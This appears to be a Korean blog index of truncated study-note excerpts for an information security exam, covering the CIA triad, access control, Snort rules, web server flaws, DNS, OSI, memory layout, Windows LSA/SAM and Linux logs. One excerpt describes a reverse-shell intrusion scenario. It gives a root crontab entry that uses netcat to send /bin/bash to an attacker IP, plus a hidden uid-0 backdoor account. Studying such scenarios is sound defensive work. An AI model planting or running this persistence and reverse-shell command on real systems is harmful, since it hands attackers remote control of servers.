어렵당

정보보호 개요 관리적 보안 : 정보보호 정책/지침/절차 수립, 정보보호 조직/인력 구성 등기술적 보안 : 보안솔루션, 보안설정, 개발보안(시큐어코딩) 등물리적 보안 : 시설물/장비 출입통제/CCTV 등정보보호의 3요소(CIA Triad) 및 목표 : 기밀성, 무결성, 가용성 + 인증, 부인방지, 책임 추적성 등  강제적 접근통제(MAC : Mandatory Access Control) 정책: 사용자에게 부여된 보안 취급인가와 자원에 부여된 보안 수준을 비교하여 접근통제를 수행: 관리자에 의해서만 권한설정된다 - BLP(Bell-LaPadula) 모델: 주체보다 보안 수준이 높은 객체의 정보를 읽을 순 없지만 쓸 수 있고 주체보다 보안 수준이 낮은 객체에 정보를 볼순 있지만 쓸 수 없다.: 최초의 수학적 ..

리버스 쉘(Reverse Shell) 침해 사고 시나리오 1. 외부에서는 방화벽 정책에 의해 원격접속이 불가능하기 때문에 내부 침입을 하여 telnet으로 무작위대입/사전공격을 수행, 루트계정의 패스워드를 알아낸다 2. 공격자는 이후 반복적 칩입을 손쉽게 하기 위해 일반 사용자 계정처럼 보이는 루트 권한(uid/gid 0)의 사용자 계정을 생성 3. 지속적으로 외부에서 웹서버에 접근할 수 있도록 netcat프로그램을 이용하여 리버스 쉘연결 작업을 cron 테이블에 등록- /etc/crontab 등록 예시 : 30  2  *  *  *  root  /usr/bin/nc 10.10.10.10 80 -e /bin/bash (10.10.10.10 공격자 주소의 80port)- echo를 이용한 crontab 등..

보안장비 침입탐지 시스템 snort 주요 기능 : 패킷 스니퍼(sniffer), 패킷 로거(logger), 네트워크 IDS/IPS 기능: snort rule은 크게 헤더와 바디(옵션)부분으로 구성된다: 패턴 매칭 방법으로 바이너리(binary) 비교 방법과 텍스트(text) 비교 방법이 있으며 텍스트 비교 방법은 바이너리 비교방법에 비해 속도가 느리지만 유연한 패턴 매칭을 제공 룰 헤더(header)1. Rule Actions : 처리방식(8가지)alert : 선택한 alert 방식을 이용해서 alert를 발생시키고 패킷을 로그에 남긴다log : 패킷을 로그에 남긴다pass : 패킷을 무시한다activate : alert를 발생시키고, 대응하는 dynamic rule을 활성화한다dynamic : acti..

웹서버 보안 디렉터리 리스팅(Directory Listing) 취약점: 서버의 인덱싱(리스팅) 기능이 활성화 되어있을 경우, 공격자가 강제 브라우징(디렉터리를 직접 명시)을 통해 서버 내의 모든 디렉터리 및 파일 목록을 볼 수 있는 취약점 예시) 디렉터리 리스팅 공격http://192.168.56.100/home/board/list.php가 아닌http://192.168.56.100/home/board/처럼 디렉터리 경로만 요청응답코드가 200 OK, 타이틀에 Index of /home/board, 이름/마지막 수정일시/크기/설명 등의 항목이 보이는것으로 보아 공격이 성공한 것을 알 수 있다  대응방안1. 아파치 웹서버 설정파일(httpd.conf) Options에 있는 Indexes를 제거하여 디렉터리..

DNS: 도메인 정보를 관리하는 분산 데이터베이스 시스템 DNS 질의 순서1. PC의 로컬 DNS Cache 검색( 윈도우 명령어 : ipconfig /displaydns , ipconfig /flushdns)2. hosts 파일 검색(hosts.ics를 먼저 검색 후 hosts파일 검색)( 윈도우 파일경로 : C:\Windows\System32\drivers\etc )( 리눅스 파일경로 : /etc/hosts )3. DNS서버 질의 Recursive/Cache/Resolving DNS서버: 관리하는 도메인이 없으며 모든 도메인 질의에 대해서 응답해주는 DNS서버: 재귀적 질의(Recursive Query)가 들어오면 캐시에 정보를 먼저 확인하고 없으면 Authoritative dns서버에 반복적 질의(..

OSI 7계층 참조모델: 분산된, 서로 다른 시스템간의 네트워크 상호호환을 위해 필요한 표준 아키텍처를 정의한 참조모델  PDU(Protocol Data Unit)(데이터 단위)(ex : bit, frame, packet, segment, data): PCI(Protocol Control Information, 프로토콜 제어 정보)와 SDU(Service Data Unit, 전송 데이터)로 구성  캡슐화 과정 : 상위 계층 프로토콜로부터 전달받은 데이터에 해당 계층 프로토콜의 기능 수행에 필요한 제어 정보를 추가해서 새롭게 데이터를 완성한 후 하위 계층으로 전달 역캡슐화 과정: 하위 계층 프로토콜로부터 전달받은 데이터에 해당 계층 프로토콜의 제어 정보를 제거한 후 상위 계층 프로토콜로 전달한다------..

프로세스: 가상메모리에 할당되며 크게 사용자영역과 커널영역으로 구분: 프로세스가 생성되면 커널은 프로세스별 관리정보(프로세스 ID 등)를 담고 있는 프로세스 제어 블록(PCB)가 생성 Init 프로세스 : 시스템 런 레벨(운영모드)에 따른 시스템 초기화, 대리모 프로세스 역활 수행( 대리모 프로세스 : 부모 프로세스가 죽어서 고아 프로세스가 된 프로세스의 부모 프로세스가 되어준다 )런 레벨 0 : (Halt) 시스템 중지 런 레벨 1 : (Single user mode) 단일 사용자 모드런 레벨 2 : (Multiuser withous NFS) 네트워크를 사용하지 않는 다중 사용자 모드런 레벨 3 : (Full Multiuser mode) 네트워크를 지원하는 다중 사용자 모드런 레벨 4 : (Unused..

- 프로세스 메모리 레이아웃(유닉스) STACK : 함수 처리, 로컬변수/매개변수를 처리하기 위한 영역( LIFO 방식-Last In First Out, Push-Pop 이용 )HEAP : 동적 메모리 할당영역(malloc 같은 함수로 필요할때 자유롭게 메모리 할당)BSS : 초기화되지 않은 전역변수,정적변수가 위치데이터 영역 : 초기화된 전역변수,정적변수가 위치TEXT(CODE) : 기계어로된 실행코드가 위치 레지스터 : CPU가 연산을 수행하기 위해 사용하는 고속 저장장치Intel CPU 기준 대표적으로 아래의 레지스터가 있다- ESP: 스택 연산이 발생하는 스택 프레임의 최하위 포인터(SP:Stack Pointer)를 저장하고있는 레지스터- EBP : 스택 프레임에 기준이 되는 SFP(Stack F..

윈도우 구성요소(LSA, SAM, SRM) 1. LSA (Local Security Authority): 모든 계정의 로그인에 대한 검증 및 시스템 자원(파일 등)에 대한 접근 권한을 검사(로컬 및 원격 로그인 포함): 계정명과 SID(Security ID - 계정을 확인하기 위한 고유한 식별번호)를 매칭하며 SRM이 생성한 감사 로그를 기록: NT 보안의 중심 서비스이며 보안 서브시스템이라 불림 2. SAM (Security Account Manager): 사용자/그룹 계정 정보에 대한 데이터베이스를 관리: 사용자 로그인 정보와 SAM 파일에 저장된 사용자 패스워드 정보를 비교해 인증 여부를 결정: SAM 파일은 사용자, 그룹 계정 및 암호화된 패스워드 정보를 저장하고 있는 데이터베이스로 윈도우 설치 ..

리눅스/유닉스 로그파일-------------------------------------utmp(or utmpx): 현재 로그인한 사용자의 상태정보를 담고있는 로그파일 (( 리눅스 ))- 확인 명령어 : w,  who, finger(w 명령어를 통해서 IDLE 유휴시간(명령없이 대기하고있는 시간)과 터미널 정보 그리고 어떤 명령을 실행했는지도 알수있기 때문에 주로 사용)- 파일경로 : /var/run/utmp (( 유닉스 ))- 확인 명령어 : 리눅스와 동일 - 파일경로 : /var/adm/utmpx  -------------------------------------wtmp(or wtmpx): 사용자의 성공한 로그인/로그아웃 정보, 시스템 Boot/Shutdown 정보에 대한 히스토리를 담고있는 로그파..